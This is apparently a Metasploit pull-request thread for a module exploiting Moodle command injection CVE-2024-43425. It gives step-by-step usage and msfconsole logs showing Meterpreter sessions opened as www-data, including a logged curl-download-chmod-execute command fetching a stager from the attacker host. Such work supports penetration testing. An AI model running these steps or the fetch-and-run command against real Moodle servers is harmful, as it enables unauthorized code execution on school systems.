Moodle RCE (CVE-2024-43425) Module

[h4x-x0r]

This is a new module which exploits a command injection vulnerability in Moodle (CVE-2024-43425) to obtain remote code execution. By default, the application will run in the context of www-data, so only a limited shell can be obtained.

Valid credentials are required to exploit this vulnerability. Moreover, the user must be authorized to either add a new or modify an existing quiz, in order to reach the vulnerable function and trigger the bug. User roles that fall into this category include Teacher and Administrator, but might differ depending on the specific deployment and configuration.

Verification Steps

1. Download the application from here.
2. Deploy it by following the vendor's installation guide.
3. Create a new course with a quiz.
4. Create a new user (e.g., of role Teacher) and assign it to the previously created course.
5. Authenticate as the new user, confirm that you can access the course, and can add new questions.
6. Obtain the course ID. Can be retrieved from the URL when the course is selected (e.g., <IP>/moodle/course/view.php?id=3).
7. Obtain the course module ID (CMID). Can be retrieved from the URL when the "Add question" button is pressed within a quiz of a course (e.g., IP>/moodle/mod/quiz/edit.php?cmid=4).
8. Start msfconsole
9. use exploit/linux/http/moodle_rce
10. set USERNAME <USER>
11. set PASSWORD <PASSWORD>
12. set CMID <ID>
13. set COURSEID <ID>
14. set RHOSTS <IP>
15. set LHOST <IP>
16. exploit

msf6 exploit(linux/http/moodle_rce) > exploit 

[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Obtaining MoodleSession and logintoken...
[+] Server reachable.
[*] Authenticating as testuser...
[*] Successfully authenticated.
[*] Obtaining sesskey, courseContextId, and category...
[*] Injecting command...
[*] Sending stage (3045380 bytes) to 192.168.217.141
[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.141:37152) at 2024-09-01 18:19:44 -0400
[-] Exploit aborted due to failure: unreachable: Failed to receive a reply from the server.
[*] Exploit completed, but no session was created.

msf6 exploit(linux/http/moodle_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer     : 192.168.217.141
OS           : Ubuntu 24.04 (Linux 6.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

meterpreter > getuid 
Server username: www-data

Notes

Obtaining the course ID and course module ID has to be done manually by the user running the module. While it could be automated, there are too many variables to consider (multiple courses, multiple quizzes, specific configurations of these, specific permissions assigned to the given user, etc.). Since it is fairly trivial to obtain these from the address bar while browsing Moodle, it shouldn't be a big burden for the user.

I played around with different timeouts and similar properties, but the current draft of the module always results in a shell that isn't directly caught when the module is executed:

[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.141:37152) at 2024-09-01 18:19:44 -0400
[-] Exploit aborted due to failure: unreachable: Failed to receive a reply from the server.

While it's not a big issue to manually select the session, it would be nicer if it gets caught while running the module. Is there a specific MSF directive or property I can add to make this more reliable in my module?

Currently no check method is implemented, as I didn't see an endpoint that returns the version details to an unauthenticated user.

I'm leaving it as a draft for now, as I still want to do some cleanup and improvements, as well as incorporate some of the feedback that I got in other PRs that apply here too. However, the current code should work in the majority of cases as is, in case someone would like to test it already.

[jheysel-r7]

Would you be able use 'keep_cookies' => true instead of manually extracting moodlesession?

[h4x-x0r]

In this case I had issues getting it to work with keep_cookies, as sometimes an expected cookie was not present in the order the requests are being sent to the server, if I remember correctly.

[jheysel-r7]

Could this, and maybe some of the other values being sent here, be randomized?

[h4x-x0r]

Yes, I used hardcoded values to get an initial PoC working. I'll see which ones I can randomize and update the code accordingly.

[ABC20236]

Hello teacher, I found that the 6.4.26 version of msfconsole does not integrate this vulnerability library, where can I get this vulnerability library?

[h4x-x0r]

@ABC20236 It hasn't been merged yet. If you'd like to use it already, you can add it yourself by copying the files from this PR (located at https://github.com/rapid7/metasploit-framework/pull/19430/files). The module is still a draft, but should work.

@jheysel-r7 Thank you for your feedback! Hopefully I have more time in the coming days to work through your comments (as well as for the other pending PRs) and update the module(s) accordingly.

[ABC20236]

Teacher, thank you so much for your help, I used the file you provided to test locally, but I encountered the following problem, due to limited ability, I hope to get your help.
[] Obtaining MoodleSession and logintoken...
[+] Server reachable.
[] Authenticating as admin...
[] Successfully authenticated.
[] Obtaining sesskey, courseContextId, and category...
[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.

[h4x-x0r]

Thank you for reporting the bug. Can you please enter set verbose true and set HttpTrace true, run the module again, and share the output (feel free to replace any sensitive information in case you are not testing in a lab environment..)? That should help to see where exactly the issue is coming from. It might be that sesskey, courseContextId, or category is not getting an expected value.

As this module is still a draft, it has a couple issues with handling error cases, missing code optimizations, etc.

[adfoster-r7]

As this module is still a draft, it has a couple issues with handling error cases, missing code optimizations, etc.

Awesome, let us know if you need any help getting it over the line for landing 🎉

[h4x-x0r]

@adfoster-r7 Thank you, I appreciate it. I'll try to provide an update this week.

[h4x-x0r]

Finally pushed some (minor) updates.

msf6 exploit(linux/http/moodle_rce) > exploit 

[*] Command to run on remote host: curl -so ./GQOnfyVgoWs http://192.168.217.128:8080/H6a7BpwRd2Nhhv1l5o8F3A; chmod +x ./GQOnfyVgoWs; ./GQOnfyVgoWs &
[*] Fetch handler listening on 192.168.217.128:8080
[*] HTTP server started
[*] Adding resource /H6a7BpwRd2Nhhv1l5o8F3A
[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Obtaining MoodleSession and logintoken...
[+] Server reachable.
[*] MoodleSession: pms6oji174tes157lrpbkcim9j
[*] logintoken: nQm84LJ6zIrNVBRQeZzyW5yTwIaXQMZJ
[*] Authenticating as newuser2...
[*] MoodleSession: cjbnqi58dakck8rs7p85a78d0r
[*] MOODLEID1_: %2583%2526%25A4%251E%2500%25C6n%25C9
[*] Successfully authenticated.
[*] testsession: 4
[*] Obtaining sesskey, courseContextId, and category...
[*] Obtaining sesskey...
[*] sesskey: sXqDX1ndBb
[*] courseContextId: 23
[*] category: 10
[*] Injecting command...
[*] id value: 138
[*] Client 192.168.217.141 requested /H6a7BpwRd2Nhhv1l5o8F3A
[*] Sending payload to 192.168.217.141 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.217.141
[*] Meterpreter session 26 opened (192.168.217.128:4444 -> 192.168.217.141:50302) at 2024-11-12 22:33:35 -0500
[-] Exploit aborted due to failure: unreachable: Failed to receive a reply from the server.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/moodle_rce) > sessions -i 26
[*] Starting interaction with 26...

meterpreter > sysinfo 
Computer     : 192.168.217.141
OS           : Ubuntu 24.04 (Linux 6.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid 
Server username: www-data

@adfoster-r7 If you or someone else from your team has some cycles to help get this merged, that would be great. I probably won't have much time left this year to work on modules.